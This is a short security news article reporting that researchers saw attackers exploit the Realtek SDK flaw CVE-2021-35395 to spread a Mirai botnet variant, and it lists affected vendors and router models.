Researchers at cybersecurity company SAM are warning of hackers attempting to exploit a recent set of dangerous vulnerabilities in Realtek SDK that came to light earlier this month.
Tracked as CVE-2021-35392, CVE-2021-35393, CVE-2021-35394 and CVE-2021-35395, the critical flaws reside in Realtek chipsets used in hundreds of thousands of smart devices from at least 65 vendors, including Asus, Belkin, D-Link, Netgear, Tenda, ZTE, and Zyxel to name a few. The affected devices are ranging from residential gateways and travel routers to Wi-Fi repeaters, IP cameras, and smart lightning gateways or connected toys, according to security firm IoT Inspector that first disclosed the flaws.
By exploiting above vulnerabilities, remote unauthenticated attackers can fully compromise the target device and execute arbitrary code with the highest level of privilege.
Just mere days after the details of the vulnerabilities were made public, SAM researchers noticed that one of the flaws (CVE-2021-35395) has been exploited in the wild to spread a Mirai variant - the same variant spotted in March by Palo Alto Networks.
“Specifically, we noticed exploit attempts to “formWsc” and “formSysCmd” web pages. The exploit attempts to deploy a Mirai variant detected in March by Palo Alto Networks,” the researchers said.
“A similar incident was reported two weeks ago, on August 6th, by Juniper Networks . A newly discovered vulnerability was then exploited in the wild only 2 days after publication to spread the same Mirai variant… The webserver serving the Mirai botnet uses the same network subnet, indicating that the same attacker is involved in both incidents.”
The SAM research team said that based on their own analysis, the most common device models currently running the vulnerable Realtek SDK include the following:
Netis E1+ extender
Edimax N150 and N300 Wi-Fi router
Repotec RP-WR5444 router
The researchers provided full attack details, as well as Indicators of Compromise (IOCs) in their blog post.